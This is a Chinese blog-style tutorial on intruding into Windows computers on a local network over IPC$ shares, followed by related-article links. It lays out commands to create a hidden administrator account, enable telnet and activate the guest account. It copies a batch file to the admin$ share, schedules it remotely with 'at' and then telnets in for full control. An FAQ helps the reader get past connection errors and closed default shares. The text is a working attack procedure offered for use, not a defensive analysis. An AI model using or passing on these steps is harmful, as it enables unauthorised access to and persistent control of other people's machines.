局域网IPC入侵心得

一、入侵实例

1、获取目标的IP。这个不用说，既然要接入别人的电脑，首先当然得知道对方的IP 了。

2、打开记事本，键入命令，编写好命令后，把该文件另存为“kaloun.bat”（当然这里也可以制作成为程序或者直接木马客户端也行。制作时，每一条命令一行，不需要标点符号）。其中命令可选择有以下，辅助入侵：

net user kaloun 123456 /add

net localgroup administrators kaloun /add

net start telnet 激活电脑telnet服务，电脑默认是不会打开的

net user abcd /del，将用户名为abcd的用户删除

net user guest /active:no，将用户名为guest的用户禁用

net user guest /active:yes，激活用户名为guest的用户，部分电脑只允许简单文件共享，所以最好把guest帐户激活，并改为管理员帐户

net user abcd，查看用户名为abcd的用户的情况

3、打开本地“命令提示符”对其进行如下命令操作：

ping IP,判断现在是否可以接入。有时可能会因为网络或者防火墙等问题不能接入。也有可能是对方电脑设置了安全机制，禁止ping命令产生回复等。

以下是接入命令：

net use \\ip\ipc$ 不知道密码和帐户是先建立空连接，否则可以直接建立非空连接

（net use \\ip\ipc$ "password" /user:administrator）

copy kaloun.bat \\ip\admin$ 其中还可以设为C$/D$/E$等。ADMIN目录（C:\WINNT\）

net time \\ip

at \\ip 18:00 C:\kaloun.bat 这里的时间根据net time测出的时间确定，一般晚上一两分钟.这里一定要指定kaloun.bat 的路径，否则默认应该是C:\WINNT\，以造成失败。

此时，应该既有系统管理员帐户了，并且打开了telnet服务。所以可以建立权限较大的ipc连接，

net use \\ip\ipc$ "password" /user:administrator

telnet ip 进行远程连接（也可以直接在附件里打开远程登陆窗体连接）

完成！！！！！

这样就可以完全控制目标电脑了。

四、另外，补充一些常用的命令：

net share ipc$ /del

net share admin$ /del

net share c$ /del

net share d$ /del

net user：系统账号类操作；

net localgroup：系统组操作

net use：远程连接、映射操作

net send：信使命令

net time：查看远程主机系统时间

cls命令：清屏命令。

netstat -n命令：查看本机网络连接状态

nbtstat -a IP命令：查看指定IP主机的NetBIOS信息

五常见问题与解答

0.如果目标电脑勾选了“简单文件共享”，则连接目标电脑是就只能以guest帐户的权限对文件进行操作。所以必要时，最好提高guest的权限或取消“简单文件共享”。

1．问：与远程主机建立IPC$需要满足什么条件？

答：本地机所需条件：

作为一个网络平台，操作系统应该是Windows 2000或以上，而不能使用Windows 9x，因为Windows 9x系列操作系统的网络功能还不完善，与远程主机建立IPC$，本地计算机也应该开放IPC$。在获得远程主机的管理员账号和密码的情况下，IPC$才可能建立成功，IPC$空连接除外。

远程主机所需条件：

需要开放IPC$共享。

运行Server服务。

综上所述，虽然需要本地机和远程计算机满足这么多条件，但这些条件都是系统默认安装的。因此，只要本地机和远程主机没有进行手动更改，就可实现IPC$。

2．问：与远程主机建立IPC$成功，但是文件考拷贝到远程主机失败，为什么？

答：很多电脑在建立IPC$空连接时是不支持文件拷贝的。在拷贝文件到远程主机之前需要先用管理员账号与远程主机建立IPC$连接，而不是IPC$空连接。如果建立了IPC$连接仍然不能进行拷贝操作，则说明远程主机关闭了C盘，D盘等默认共享资源，这时候可以使用计划任务开启这些共享资源，比如“at \\IP TIME NET SHARE c:

”。

4．问：当通过IPC$建立连接时出现“错误5”，结果造成连接建立失败，为什么？

答：5号错误的原因是权限不足。除错误5外，其他常见错误及其原因如下。

错误号51，Windows无法找到网络路径：网络有问题；

错误号53，找不到网络路径：IP地址错误；目标未开机；目标Server服务未启动；目标有防火墙（端口过滤）或者没有IPC$；

错误号67，找不到网络名：你的Workstation服务未启动；目标删除了IPC$；

错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个IPC$，请删除再连。

错误号1326，未知的用户名或错误密码：原因很明显了；

错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动。（连接域控会出现此情况）

错误号2242，此用户的密码已经过期：目标有账号策略，强制定期要求更改密码。

5．问：即使用户名和密码并不正确，有时也能与远程主机建立IPC$连接，为什么？

答：确实存在着这种情况，有时使用随便命名的用户名和密码，甚至该账号并不存在，也可以与远程主机建立IPC$连接。该情况类似于IPC$空连接漏洞，其结果也与建立IPC$空连接后一样，不能执行操作类命令。

局域网IPC入侵心得相关推荐

关于局域网IPC入侵XP方法
1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网: 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子. 入侵工具: 一般 ...
一份详尽的IPC$入侵资料
一唠叨一下: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文 ...
局域网病毒入侵原理和防御
局域网病毒入侵原理及现象计算机病毒在网络中泛滥已久,而其在局域网中也能快速繁殖,导致局域网计算机的相互感染,使整个公司网络瘫痪无法正常运做,其损失是无法估计的. 一.局域网病毒入侵原理及现象一般来 ...
局域网病毒入侵原理及防范方法
计算机病毒在网络中泛滥已久,而其在局域网中也能快速繁殖,导致局域网计算机的相互感染,使整个公司网络瘫痪无法正常运做,其损失是无法估计的. 一.局域网病毒入侵原理及现象一般来说,计算机网络的基本构成包 ...
Windows 远程控制（经典IPC$入侵、psexec类工具、利用WMI远程入侵、PsRemoting远程命令执行、使用wmic命令远程执行）
一.经典IPC$入侵利用ipc$和默认共享入侵远程电脑的过程 1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名&qu ...
关于IPC入侵的一些细节
1.第一种情况: 文件夹选项-查看-使用简单文件共享,如果选择了这个选择,那么IPC输入任一密码都可以建立成功,但是没有权限上传文件.这时IPC破解可以说不好使了. 测试: C:\Users\exch ...
计算机组装与维护心得体会作文,《计算机维护与局域网建设》学习心得
<计算机维护与局域网建设>学习心得本文关键词:局域网,学习心得,建设,计算机维护 <计算机维护与局域网建设>学习心得本文简介:计算机维护与局域网建设课堂心得本来这门课程对于 ...
445port入侵具体解释
445port入侵具体解释关于"445port入侵"的内容 445port入侵具体解释本站搜索很多其它关于"445port入侵"的内容 445port ...
IPC$连接常见问答
IPC$连接常见问答十五 ipc$入侵问答精选 1.进行ipc$入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗? 答:留下记录是一定的,你走后用清除日志程序删除就可以了,或者用肉鸡 ...
入侵Windows服务器的流程
一般情况下,黑客往往喜欢通过文章的上所示的流程图对Windows服务器进行攻击,从而提高入侵服务器的效率. ·通过端口139进入共享磁盘.139端口是为"NetBIOS Session Se ...

局域网IPC入侵心得

局域网IPC入侵心得相关推荐

最新文章

热门文章